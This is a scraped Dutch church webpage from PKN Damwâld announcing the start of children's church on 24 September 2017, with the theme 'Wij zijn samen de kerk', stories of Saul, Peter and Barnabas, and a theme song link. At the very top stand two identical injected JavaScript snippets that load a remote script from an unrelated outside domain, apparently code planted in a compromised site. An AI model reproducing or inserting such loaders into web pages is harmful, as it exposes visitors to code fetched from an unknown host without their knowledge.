;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Start Bernetsjerke op 24 september. Thema "Wij zijn samen de kerk" - PKN Damwâld

Start Bernetsjerke op 24 september. Thema “Wij zijn samen de kerk”

Gepubliceerd op: woensdag 13 september 2017

Op 24 september start de Bernetsjerke met het thema: “Wij zijn samen de kerk”

De komende weken horen de kinderen over de geboorte en de groei van de eerste gemeente. Zo horen ze de verhalen van  mensen die tot geloof zijn gekomen en zich hebben ingezet voor de groei van de eerste gemeente.

Denk hierbij aan het verhaal van de bekering van Saulus. Saulus die opeens tot geloof kwam en andere mensen hierover heeft verteld.

Van Petrus in de gevangenis die geloofde dat God hem zou helpen en dit ook waar bleek te zijn en van Barnabas die de christenen aanmoedigde om bij elkaar te blijven en te geloven en op deze manier het goede voorbeeld gaf.

Samen staan we sterk en dit is nog steeds terug te zien in onze gemeente. Wij zijn samen de kerk!

Bij terugkomst in de kerk zingen we het themalied en deze keer is dat: “God heeft een plan met je leven”. https://www.youtube.com/watch?v=fDo-6ufmHiA.